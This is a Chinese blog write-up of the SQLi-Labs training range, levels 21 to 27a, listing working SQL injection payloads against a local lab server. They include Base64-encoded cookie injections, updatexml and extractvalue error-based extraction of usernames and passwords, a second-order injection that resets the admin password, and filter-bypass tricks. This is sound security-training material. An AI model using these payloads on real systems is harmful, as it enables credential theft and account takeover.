[靶场] SQLi-Labs Less21-Less27a

最新推荐文章于 2024-05-05 19:49:43 发布
最新推荐文章于 2024-05-05 19:49:43 发布
阅读量348 收藏 1
点赞数
分类专栏: # 靶场 文章标签: sqli
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40929683/article/details/120447161
版权

提供主要的语句,略去探测数据库名,表名,字段名的步骤。 

21.Less21

请求方式注入方式类型备注
POST基于报错注入(updatexml函数)字符型Base64编码,Cookie注入点,单引号、括号闭合

已经提前取得一个用户信息,用户名dumb,密码2

并且之后的操作都是用BurpSuite的重发器测试。

1. 正常提交

首先正常登陆上去。

可以发现Cookie进行了Base64编码,我们后续操作都需要对语句进行Base64编码。 

2. 语句报错

# Cookie: uname=Dumb1'2"3
Cookie: uname=RHVtYjEnMiIz

3. 执行注入的SQL

# Cookie: Dumb ')  or 1 #
Cookie: RHVtYiAnKSAgb3IgMSAj

# Cookie: uname=Dumb ')  order by 4#
Cookie: uname=RHVtYiAnKSAgb3JkZXIgYnkgNCM

# Cookie: uname=Dumb ')  order by 3#
Cookie: uname=RHVtYiAnKSAgb3JkZXIgYnkgMyM=

4. 数据获取

# Cookie: uname=Dumb ')  union select 1,2,updatexml(1,  concat(0x7e, (select version())) ,1) #
Cookie: uname=RHVtYiAnKSAgdW5pb24gc2VsZWN0IDEsMix1cGRhdGV4bWwoMSwgIGNvbmNhdCgweDdlLCAoc2VsZWN0IHZlcnNpb24oKSkpICwxKSAj

即可报错出数据库版本。使用下面的代码即可爆出数据库的数据。

# Cookie: uname=Dumb ')  union select 1,2,updatexml(1,  concat(0x7e, (select  concat_ws(0x7e,username,password) from (select * from users limit 0,1)x   )) ,1) #
Cookie: uname=RHVtYiAnKSAgdW5pb24gc2VsZWN0IDEsMix1cGRhdGV4bWwoMSwgIGNvbmNhdCgweDdlLCAoc2VsZWN0ICBjb25jYXRfd3MoMHg3ZSx1c2VybmFtZSxwYXNzd29yZCkgZnJvbSAoc2VsZWN0ICogZnJvbSB1c2VycyBsaW1pdCAwLDEpeCAgICkpICwxKSAj

22.Less22

请求方式注入方式类型备注
POST基于报错注入(updatexml函数)字符型Base64编码,Cookie注入点,双引号闭合

已经提前取得一个用户信息,用户名dumb,密码2

并且之后的操作都是用BurpSuite的重发器测试。

1. 正常提交

首先正常登陆上去。

2. 语句报错

# Cookie: uname=Dumb 1'2"3
Cookie: uname=RHVtYiAxJzIiMw==

3. 数据获取

和Less21类似,都是在Cookie注入,并且Cookie进行了Base64编码,区别是Less22使用双引号(")闭合,我们修改Less21的SQL语句为双引号闭合即可。

# Cookie: uname=Dumb" or 1 #
Cookie: uname=RHVtYiIgb3IgMSAj


# Cookie: uname=Dumb" union select 1,2, updatexml(1,  concat(0x7e,   (select version()) )  ,1)  #
Cookie: uname=RHVtYiIgdW5pb24gc2VsZWN0IDEsMiwgdXBkYXRleG1sKDEsICBjb25jYXQoMHg3ZSwgICAoc2VsZWN0IHZlcnNpb24oKSkgKSAgLDEpICAj


# Cookie: uname=Dumb" union select 1,2, updatexml(1,  concat(0x7e,   (select concat_ws(0x7e,username, password) from ( select * from users limit 0,1)x )) ,1)  #
Cookie: uname=RHVtYiIgdW5pb24gc2VsZWN0IDEsMiwgdXBkYXRleG1sKDEsICBjb25jYXQoMHg3ZSwgICAoc2VsZWN0IGNvbmNhdF93cygweDdlLHVzZXJuYW1lLCBwYXNzd29yZCkgZnJvbSAoIHNlbGVjdCAqIGZyb20gdXNlcnMgbGltaXQgMCwxKXggKSkgLDEpICAj

23.Less23

请求方式注入方式类型备注
GET基于报错注入(updatexml函数)字符型过滤注释符,单引号闭合

1. 正常提交

http://127.0.0.1:8003/Less-23/?id=1

2. 语句报错

http://127.0.0.1:8003/Less-23/?id=1 1'2"3

3. 执行注入的SQL

由于过滤的#,%23,--+等注释符,我们使用闭合前后引号,使用or连接来使用报错注入

http://127.0.0.1:8003/Less-23/?id=1' or 1 or '1
http://127.0.0.1:8003/Less-23/?id=1' or (select 1)  or '1

4. 数据获取

http://127.0.0.1:8003/Less-23/?id=1' or (select updatexml(1,  concat(0x7e, version()) , 1))  or '1

http://127.0.0.1:8003/Less-23/?id=1' or (select updatexml(1,  concat(0x7e, (select group_concat(concat_ws(0x7e, username ,password)) from (select * from users limit 0,1)x) ) , 1))  or '1

24.Less24

请求方式注入方式类型备注
POST二次注入(存储注入)字符型单引号闭合

我们猜测有一个用户名为admin。

1. 注册用户(一次注入)

用户名:admin'#,密码:123

2. 登陆用户,修改密码(二次注入)

登录用用户admin'#

修改密码,全部输入1。

由于我们的用户名为admin'#,且数据库未对单引号进行转义,我最终修改密码的语句为:

UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' 

UPDATE users SET PASSWORD='1' where username='admin'#' and password='1'

UPDATE users SET PASSWORD='1' where username='admin'

成功将admin用户的密码修改为1。

3. 登陆admin用户

用户名:admin,密码:1

同理,对其他用户名依然可以使用此方法进行重置密码。 

25.Less25

请求方式注入方式类型备注
GET基于报错注入(updatexml函数)字符型过滤or/and,单引号闭合

1. 正常提交

http://127.0.0.1:8003/Less-25/?id=1

2. 语句报错

http://127.0.0.1:8003/Less-25/?id=1 1'2"3

3. 执行注入的SQL

有如下绕过方法:1.注释符注释;2.双写;3.||替代or,&&(%26%26)替换and

http://127.0.0.1:8003/Less-25/?id=1' || 1 %26%26 '1
http://127.0.0.1:8003/Less-25/?id=1' oorr 1 aandnd '1
http://127.0.0.1:8003/Less-25/?id=1' --+

4. 数据获取

http://127.0.0.1:8003/Less-25/?id=1' oorr (select updatexml(1,concat( 0x7e, ( select version() ) ),1 )) anandd '1

26.Less25a

请求方式注入方式类型备注
GET布尔盲注整形过滤or/and

1. 正常提交

http://127.0.0.1:8003/Less-25a/?id=1

2. 语句报错

http://127.0.0.1:8003/Less-25a/?id=1 1'2"3
http://127.0.0.1:8003/Less-25a/?id=1 oorr 1

3. 执行注入的SQL

http://127.0.0.1:8003/Less-25a/?id=1 aandnd 0

http://127.0.0.1:8003/Less-25a/?id=-1 oorr (select 1)>0
http://127.0.0.1:8003/Less-25a/?id=-1 oorr (select 1)>1

4. 数据获取

使用BurpSuite进行爆破数据库版本为例。

http://127.0.0.1:8003/Less-25a/?id=-1 oorr (select ascii(substr(  (select version()) ,1,1)) )>1

整理爆破结果,可到数据库版本。 

27.Less26

请求方式注入方式类型备注
GET基于报错注入(extractvalue函数)字符型过滤空格、注释符,单引号闭合

1. 正常提交

http://127.0.0.1:8003/Less-26/?id=1

2. 语句报错

http://127.0.0.1:8003/Less-26/?id=11'2"3
http://127.0.0.1:8003/Less-26/?id=-1' or --+

3. 执行注入的SQL

由于过滤了空格,我们使用||代替or连接就不需要空格分开,过滤了注释符,我们闭合前后引号使用报错注入。

http://127.0.0.1:8003/Less-26/?id=-1'||1||'

4. 数据获取

 我们使用括号()代替空格,例如select 1写为select(1)。

http://127.0.0.1:8003/Less-26/?id=-1'||(select(extractvalue(1,concat(0x7e, (select(version()))))) )||'

28.Less26a

请求方式注入方式类型备注
GET布尔注入字符型过滤空格、注释符,单引号、括号闭合

1. 正常提交

http://127.0.0.1:8003/Less-26a/?id=1

2. 语句报错

http://127.0.0.1:8003/Less-26a/?id=11'2"3
http://127.0.0.1:8003/Less-26a/?id=1"
http://127.0.0.1:8003/Less-26a/?id=1'

3. 执行注入的SQL

这里虽然有小括号在外面,但是我们使用||逻辑连接起来,可不去闭合外面的括号。

http://127.0.0.1:8003/Less-26a/?id='|| if(0,1,0) ||'

4. 数据获取

使用BurpSuite进行爆破。

http://127.0.0.1:8003/Less-26a/?id='|| (select(ascii(substr( (select(version())),1,1 ))))=100  ||'

29.Less27

http://127.0.0.1:8003/Less-28/?id=1'
请求方式注入方式类型备注
GET基于报错注入(updatexml函数)字符型过滤关键字select、union,单引号闭合

1. 正常提交

http://127.0.0.1:8003/Less-27/?id=1

2. 语句报错

http://127.0.0.1:8003/Less-27/?id=1'
http://127.0.0.1:8003/Less-27/?id=1''

3. 执行注入的SQL

使用大小写绕过select和union过滤。

http://127.0.0.1:8003/Less-27/?id=' || (seLEct(1)) || '
http://127.0.0.1:8003/Less-27/?id='%0AUniOn%0aSeLecT%0a1,2,3|| (seLEct(1)) || '

4. 数据获取

http://127.0.0.1:8003/Less-27/?id='%0AUniOn%0aSeLecT%0a1,concat_ws(0x7e,@@datadir,@@basedir,user(),database()),3|| (seLEct(1)) || '

30.Less27a

请求方式注入方式类型备注
GET基于报错注入(updatexml函数)字符型过滤关键字select、union,双引号闭合

1. 正常提交

http://127.0.0.1:8003/Less-27a/?id=1

2. 语句报错

http://127.0.0.1:8003/Less-27a/?id=1"
http://127.0.0.1:8003/Less-27a/?id=1""

3. 数据获取

和Less27一样,主要是闭合的符号变为双引号。

http://127.0.0.1:8003/Less-27a/?id="%0AUniOn%0aSeLecT%0a1,concat_ws(0x7e,@@datadir,@@basedir,user(),database()),3|| (seLEct(1)) || "

3hex___________
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入篇——sqli-labs最详细1-40闯关指南
爱国小白帽
01-11 3万+
使用sqllabs游戏系统进行sql注入 1.首先确定用哪些字符可以进行sql注入 一.选择Less­1进入第一关,在网址中添加标红内容,显示了用户和密码 http://localhost/sqllabs­master/Less­1/index.php?id=1’ and 1=1 ­­ ­ 把1=1改成1=2,不报错也不显示任何信息,说明可以利用 ’ 字符注入 二.进入第二关,在网址中添...
(手工)【sqli-labs21-22】cookie加密注入:payload、利用过程
07-11 508
SQL-cookie加密注入】
2024年最全SQLi-LABS的Less21-30分析_less-21 coolie注入(1),怒斩获了30家互联网公司offer
最新发布
2401_84248681的博客
05-05 979
不过union select的时候没显示,也许看到注入的参数被 WAF (Web应用防御系统)防御了,通过执行一系列针对 HTTP/HTTPS 的安全策略来专门为 Web 应用提供保护的一款产品。我们注入两个同名的参数 id,第一个参数用于绕过 WAF,第二个参数用于注入。被过滤的字符,可用其他的字符进行替代,用"%a0"或"%0b"替代空格,用"||“替代"or”,使用"%26%26"替代"and"id=1")%0Bor%0B(“1”)=(“1报错,?id=1”%0bor%0b"1"="1正常。
sqli-labs靶场第二十一关
gou1791241251的博客
12-31 1284
此关有点特别,虽然是cookie注入,但是是经过编码的 发现cookie那里的值为RHVtYg== 非常像base64编码过的。我们就来尝试一下经过编码再进行注入 把单引号经过编码之后再放入cookie中。 发现报错了!说明闭合方式是有关单引号的,那么就先不考虑双引号了!! 这里我将’ and 1=1 # 经过编码放入cookie中请求,发现还是报错,说明闭合方式不仅仅是单引号! 尝试一下括号。 页面没有报错了,说明闭合方式就是 ‘) 那么现在用报错注入来进行获取一下信息吧 ‘) and ex
生命在于折腾——SQL注入的实操(五)less21-25
易水哲的博客
08-21 413
sql-lib项目,本篇文章介绍关卡21-25。 闭合变成了双引号,其余和上一关一样。 这一关过滤了注释符号,不看php文件会感觉无从下手,查看源代码发现吧# --+注释符号给过滤掉了,这里使用’。输入http://sql/Less-23/?id=’ union select 1,13,database() ’ 输入http://sql/Less-23/?id=’ union select 1,2,group_concat(table_na
Sqli-labs靶场21、22关详解[Sqli-labs-less-21、22]自动化注入-SQLmap工具注入|sqlmap跑base64加密
m0_73615178的博客
03-03 944
由于21/22雷同,都是需要登录后,注入点通过Cookie值进行测试,值base64加密修改注入数据选项:--tamper=base64encode。
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
SQLi LABS Less-21
热门推荐
wangyuxiang946的博客
08-14 1万+
sqlibals21SQLI-LABS第二十一关,sqlilabs二十一关
sqli-labs通关(less21~less30)
箭雨镜屋
09-03 3027
Less21 这关刚开始还是和Less20一样,进去是个登录的页面 输入正确的用户名和密码之后,返回的页面有User-Agent,客户端ip地址,cookie,用户名,密码,用户id等信息 登录过程中burpsuite也是抓到两个报文,第一个是发送用户名和密码的POST报文,第二个是GET报文且携带cookie 仔细看这关的GET报文,就和上一关不一样了,Cookie中uname参数的值是base64编码的。 把uname的值粘贴到burpsuite的decoder模块,先decod.
sqli-labs less21
qq_45106794的博客
10-26 298
#sqli-labs less 19 这一关大概与less18差不多,只不过playload得用base64加密 ') order by 4 ') union select 1,2,3 # ')union select 1,database(),version()# ')union select 1,(select group_concat(table_name) from information...
sqli labs less 21
Xiaoxiaoqiang_的博客
03-04 213
sql注入
SQLi-LABS的Less21-30分析
haoahaoahaoahao的博客
02-29 834
id=1'))报错,加入注释符--+或者#还报错,那么推测也许将注释符号过滤了,那么尝试//'?id=1' or 1=1 or'显示正常了,?id=1') or 1=1 or'或者?id=1')) or 1=1 or'报错,那么注入点为'输入语句。被过滤的字符,可用其他的字符进行替代,用"%a0"或"%0b"替代空格,用"||"替代"or",使用"%26%26"替代"and"id=1")%0Bor%0B("1")=("1报错,?id=1"%0bor%0b"1"="1正常。
SQL取数据库名,取表名,取列名
前方辉煌
02-04 1349
SQL取数据库名,取表名,取列名 1.获取所有用户名: SELECT name FROM Sysusers where status='2' and islogin='1' islogin='1'表示帐户 islogin='0'表示角色 status='2'表示用户帐户 status='0'表示糸统帐户 2.获取所有数据库名: SELECT Name FRO
SQLi Labs Lesson27 & Lesson27a
1ame的博客
08-23 425
Lesson - 27 GET - Error Based - All your UNION & SELECT Belong to us - String - Single Quotes 首先进入欢迎界面: 构造 ?id=1,结果如图所示: 构造 ?id=1',结果如图所示: 由错误回显信息推测后台SQL语句结构: select ...
Sqli-labs之Less-20和Less-21和Less-22
→_→
04-15 2930
Less-20 基于错误的cookie头部POST注入 首先从已知的条件中我们知道这又是一道“头部注入”,那么我们先输入正确的用户名和密码看一下登录成功是什么样子的: 回显有User-Agent、IP这样从当次Request直接获取的, 也有Cookie这样刷...
SQL注入靶场sqli-labs
12-20
7. 访问sqli-labs靶场:在浏览器中输入您的Web服务器地址,加上sqli-labs项目的路径,即可访问sqli-labs靶场。 请注意,搭建sqli-labs靶场需要一定的技术基础和安全意识。在进行任何实验之前,请确保您已经了解了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值